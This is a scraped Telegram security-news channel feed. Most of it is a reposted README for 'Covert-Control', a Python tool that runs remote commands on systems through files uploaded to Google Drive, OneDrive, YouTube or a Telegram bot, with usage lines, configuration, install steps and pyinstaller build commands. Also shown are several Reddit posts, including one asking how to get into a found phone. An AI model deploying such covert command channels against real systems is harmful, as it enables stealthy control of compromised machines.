Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Inside the Mind of a Hacker

https://cdn-images-1.medium.com/max/1920/1*bJF_FisPo6UCAeGjAMa8Qg.jpeg
Consciousness feels like its inside a ROM chip in the brain. You can only read from it, but can’t write to it whenever you feel like. The…

Continue reading on Medium »
hacking: security in practice
I have problem with firefox add on

I found an add on on the github but the link was deleted.

On the second computer I have an add on on firefox but I don't know how to put it on a new computer because link was deleted.

It's possible somehow transfer into new computer?

Any advices?

submitted by /u/Rezvord
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
“vPub v3” opensource online Party! - 16th November at 8 PM UTC

Dear security-conscious friends, thank you for a wonderful time with us on our past v1 and v2 online parties - especially the last one with Richard Stallman was pretty exciting :D Now we at 3mdeb are organizing a new event - Dasharo OSF vPub Fall 2021 (aka vPub v3) - with so many interesting topics for a pleasant discussion! Open/libre firmware/hardware - for the true cybersecurity (not by obscurity) - and more! Join us on 16th November at 8 PM UTC - using this page: https://vpub.dasharo.com/

Our new vPub is directly after the "Linux Secure Launch" TrenchBoot Summit that we're co-hosting between 4 - 8 PM UTC on 16th Nov too. It's going to be a deep dive into the truly secure opensource firmware booting - an exciting journey for those interested in firmware hardening their systems.

You are welcome to join any or both of these events, and we will be waiting for you! ;-) Let's try to stress test our servers' capabilities and beat the previous record of 50 attendees

submitted by /u/Mike-Banon1
[link] [comments]
hacking: security in practice
Trying to find out who's phone it is.

For a year, in my school's found things box there has been lying a phone. Recently I've won it in a poker game with my school janitor. Now, with my best friend we are trying to find out who is the phone's previous owner. The thing is, we know nothing about hacking. I tried connecting it to my laptop via USB, but it has some kind of programme named HiSuite that won't let me see any of the files. We identified it as an Honor 10. Any ideas for how we can get inside?

submitted by /u/Grrroooo
[link] [comments]
“vPub v3” opensource cyber Party! - 16th November at 8 PM UTC
https://www.reddit.com/r/redteamsec/comments/qrm3rl/vpub_v3_opensource_cyber_party_16th_november_at_8/

<!-- SC_OFF -->Dear security-conscious friends, thank you for a wonderful time with us on our past v1 and v2 online parties - especially the last one with Richard Stallman was pretty exciting :D Now we at 3mdeb (https://3mdeb.com/) are organizing a new event - Dasharo OSF vPub Fall 2021 (aka vPub v3) - with so many interesting topics for a pleasant discussion! Open/libre firmware/hardware for the true cybersecurity (not by obscurity), and more! Join us on 16th November at 8 PM UTC - using this page: https://vpub.dasharo.com/ Our new vPub is directly after the "Linux Secure Launch" TrenchBoot Summit that we're co-hosting between 4 - 8 PM UTC on 16th Nov too. It's going to be a deep dive into the truly secure opensource firmware booting - an exciting journey for those interested in firmware hardening their systems. You are welcome to join any or both of these events, and we will be waiting for you! ;-) Let's try to stress test our servers' capabilities and beat the previous record of 50 attendees <!-- SC_ON --> submitted by /u/Mike-Banon1 (https://www.reddit.com/user/Mike-Banon1)
[link] (https://www.reddit.com/r/redteamsec/comments/qrm3rl/vpub_v3_opensource_cyber_party_16th_november_at_8/) [comments] (https://www.reddit.com/r/redteamsec/comments/qrm3rl/vpub_v3_opensource_cyber_party_16th_november_at_8/)
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Covert-Control - Google Drive, OneDrive And Youtube As Covert-Channels - Control Systems Remotely By Uploading Files To Google Drive, OneDrive, Youtube Or Telegram

https://blogger.googleusercontent.com/img/a/AVvXsEhNNj9sLoHsQzeNXPg9G_wuz6tFFACZnQ5qGqK1LIj-vlqDBim9fO-3iCFDcjp5QX800dYWWEKLEGmAgUixYXCriGVhNVsDUUqmv2x0If0tDj-m0ZMxGcUyeMY5sM5TGdXeYW9G-1z0_BBJ4Moj4rpASC7R2ZzAKbMIgIugT6IN3tbKJtU2hiX-rPl5CA=w640-h208 Control systems remotely by uploading files to Google Drive, OneDrive, Youtube or Telegram using Python to create the files and the listeners. It allows to create text files, images, audio or videos, with the commands in cleartext or encrypted using AES.

*
covert-googledrive.py - Control systems uploading files to a public folder in Google Drive.

*
covert-onedrive.py - Control systems uploading files to a public folder in OneDrive.

*
covert-youtube.py - Control systems uploading videos to Youtube (updated from covert-tube).

*
covert-telegram.py - Control systems with a Telegram bot. Create files to uploadYou can find example files in the folder test_files or create new ones with generate_file.py: python3 generate_file.py -t TYPE [-o OUTPUTFILE] [-c COMMAND] [-e] *
-t (--type) [Required]: Types of file: "text", "image", "audio" or "video".

*
-o (--outputfile) [Optional]: Output file.

*
-c (--command) [Optional]: Command to execute.

*
-e (--encrypted) [Optional]: Add this flag to encrypt the command with AES.
Examples: python3 generate_file.py -t text -c "whoami" -o text.txt
python3 generate_file.py -t text -c "whoami" -o text_encrypted.txt -e
python3 generate_file.py -t audio -c "whoami" -o audio.wav
python3 generate_file.py -t audio -c "whoami" -o audio_encrypted.wav -e
python3 generate_file.py -t image -c "whoami" -o image.png
python3 generate_file.py -t image -c "whoami" -o image_encrypted.png -e
python3 generate_file.py -t video -c "whoami" -o video.avi
python3 generate_file.py -t video -c "whoami" -o video_encrypted.avi -e
ConfigurationCommon configuration values:

*
data_type (Optional. Default: "text"):
data_typeFile typeEncryptedValid forExtensiontextText fileNoGoogle Drive, OneDrive.txttext_encryptedText fileYesGoogle Drive, OneDrive.txtimageImageNoGoogle Drive, OneDrive.pngimage_encryptedImageYesGoogle Drive, OneDrive.pngaudioAudioNoGoogle Drive, OneDrive.wavaudio_encryptedAudioYesGoogle Drive, OneDrive.wavvideoVideoNoGoogle Drive, OneDrive, Youtube.avivideo_encryptedVideoYesGoogle Drive, OneDrive, Youtube.avi
*
delay_seconds (Optional. Default: 300): Seconds between checks of new files uploaded to the Google Drive or OneDrive folder or new videos in the Youtube channel.

*
aes_key (Optional. Default: "covert-control21"): Key for AES encryption.

*
debug (Optional. Default: True): Print messages and timestamps in the listener or not.
Specific configuration values:

*
googledrive_folder: Url of public Google Drive folder to monitor (for covert-googledrive.py).

*
onedrive_folder: Url of public OneDrive folder to monitor (for covert-onedrive.py).

*
youtube_channel_id: Youtube channel ID of the channel to monitor. You can get it from here (for covert-youtube.py).

*
youtube_api_key: Get an API key creating an application and generating the key in here (for covert-youtube.py).

*
telegram_token: Bot token, create it using BotFather. Write "/newbot", then send a name for the bot (for example, "botname") and a username for the bot ending in "-bot" (for example, "somethingrandombot") (for covert-telegram.py).

*
telegram_username: Specify a Telegram username so it only executes commands received from this user (without "@"). Google DriveIt allows to execute commands uploading text files, images, audio and videos, unencrypted or encrypted with AES. The op[...]
Hacking Articles Tips Tricks Videos Tutorials
KitPloit - PenTest Tools! Covert-Control - Google Drive, OneDrive And Youtube As Covert-Channels - Control Systems Remotely By Uploading Files To Google Drive, OneDrive, Youtube Or Telegram https://blogger.googleusercontent.com/img/a/AVvXsEhNNj9sLoHsQzeN…
tional input argument is the public folder url, which can be also configured in config.py: python3 covert-googledrive.py [FOLDER_URL] The listener will check the Google Drive folder every 300 seconds by default (can be updated in config.py). In this case a video, "video.avi", is uploaded with the command in the QR of the video: https://blogger.googleusercontent.com/img/a/AVvXsEh7PO-zrz2mNqj_VY_kmDQET7GpTa-DBXLbSgqobq2g57tZlhzliEKTGAY4hQC6pRLnEfj-At1mg8ocvDhXVSQVxuq7fvza7DpwVXbRaFC6Gydeo93dLx8wONmBH7fW1XR5IUTzt13waDxHiN0IOeE9fwKULFFNWT82Sa4lqucyf6LZ_WcVPejBNAknRw=s16000 After finding there is a new file uploaded to the folder, it is downloaded, processed and the commands are executed: https://blogger.googleusercontent.com/img/a/AVvXsEhrO6AoXrhATjZf2RQwnQrgOpG3b_o9XgLVB63mwZ-83yszv1b21pgZDz8CdKhDZ3tPG11FEzXk7kffgTQQgRrU9bIswB2s7zWezpL4RVDEiU_oxJOXMj3XTqZ0_nkjFqjYP0R0fDhklk5bfc_wwh4DGYNAHhIcQkrEZVWLpehorezYJ4CcHF9egZt8Yg=w640-h146 OnedriveIt allows to execute commands uploading text files, images, audio and videos, unencrypted or encrypted with AES. The optional input argument is the public folder url, which can be also configured in config.py: python3 covert-onedrive.py [FOLDER_URL] The listener will check the OneDrive folder every 300 seconds by default (this can be updated in config.py). In this case an audio, "audio_encrypted.wav", is uploaded with the command encrypted with AES: https://blogger.googleusercontent.com/img/a/AVvXsEhEyfjlRlenIcZsZjpFU-fKoRCujugREmhXvznuTVo5LXdBscQx9TmCoqBGXl5q-pTCbJfUPbYWT7FD3pdnQHPEw-kRqsjw02HYsJ2km0pPurJXlNjlvI-G4wGo79bCKiUliQvnfDwA3_-ID0hfYEMJ0hs9vmIAj35E_uUwoUd8nMsDJSd_IES3UuxFUA After finding there is a new file uploaded to the folder, it is downloaded, processed and the commands are executed: https://blogger.googleusercontent.com/img/a/AVvXsEiYLaLyA0SBCBnmOefTKuBCm0mJPxRan9E7afhg4-uciPfaCkQMcdFcve7ndZBzmXSD10jt_16Wqb05gt9xUM4_HEPtR7dV79aPbeCM59iqecrORaNbMZ0ou5bkx_FCnmtdEZKAOaBD9OffGoed6WEaEgvW3aDtTXqErE7biGhOEp0gxnLLU9BGRcorBA=w640-h192 NOTE: This will only work if you do not delete any file in the folder, if you do it you must create a new one. It could be possible to implement it to work even after deleting files, but it would be necessary to create many requests and would be less stealthy. YoutubeIt allows to execute commands uploading videos, unencrypted or encrypted with AES. The optional input arguments are the Youtube channel ID to monitor and the API key, which can be also configured in config.py: python3 covert-youtube.py [CHANNEL_ID] [API_KEY] The listener will check the Youtube channel every 300 seconds by default (this can be updated in config.py). First the video is uploaded: https://blogger.googleusercontent.com/img/a/AVvXsEhNNj9sLoHsQzeNXPg9G_wuz6tFFACZnQ5qGqK1LIj-vlqDBim9fO-3iCFDcjp5QX800dYWWEKLEGmAgUixYXCriGVhNVsDUUqmv2x0If0tDj-m0ZMxGcUyeMY5sM5TGdXeYW9G-1z0_BBJ4Moj4rpASC7R2ZzAKbMIgIugT6IN3tbKJtU2hiX-rPl5CA=w640-h208 After finding there is a new video in the channel, it is downloaded, processed and the commands are executed: https://raw.githubusercontent.com/ricardojoserf/ricardojoserf.github.io/master/images/covert-control/image6.png TelegramControl systems remotely with a Telegram bot. This option does not allow to upload files, but it is possible to send the commands in cleartext ("/cmd") or encrypted with AES ("/encrypted"). The first optional input argument is the bot token, which can be also configured in config.py; the second one is used to configure a single Telegram user who can send commands to the bot (without "@"): python3 covert-telegram.py [BOT_TOKEN] [TELEGRAM_USER] The listener will check the commands in the chat and show the output: /cmd CLEARTEXT_COMMAND
/encrypted AES_ENCRYPTED_COMMAND
https://blogger.googleusercontent.com/img/a/AVvXsEg-1_4o1us_yNCz9ZidsoW_mtZlnwav_5QydCPGjjnMdEt-TlN5UY7dmKmynXIpULarG7g6oUPWHrR98moyAscbq7799a-2mh7wBL8hCR13dPe1bLfYqPsJQ0FLUXOpG[...]
Hacking Articles Tips Tricks Videos Tutorials
tional input argument is the public folder url, which can be also configured in config.py: python3 covert-googledrive.py [FOLDER_URL] The listener will check the Google Drive folder every 300 seconds by default (can be updated in config.py). In this case a…
vxlWTVvRfguyrFXYVG4Ud-n4FdSsXgN5QHdX_z6f7bcMkc05RgBa9j1f5zXnw=w640-h330 Installationsudo apt install libzbar0
pip install bs4 Pillow opencv-python pyqrcode pypng pyzbar youtube_dl pytesseract python-telegram-bot requests argparse pycryptodome
git clone https://github.com/ricardojoserf/covert-control && cd covert-control/
Creating standalone binariespyinstaller --onefile covert-googledrive.py
pyinstaller --onefile covert-onedrive.py
pyinstaller --onefile covert-telegram.py
pyinstaller --onefile covert-youtube.py
rm -rf build
rm *spec
ls dist/
Download Covert-Control Sent by @TheFeedReaderBot
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Should Our Security Controls Be More Like North Korea or Norway?

When the drive for additional visibility and awareness is led by the business rather than just a SOC team, both the business and security can benefit.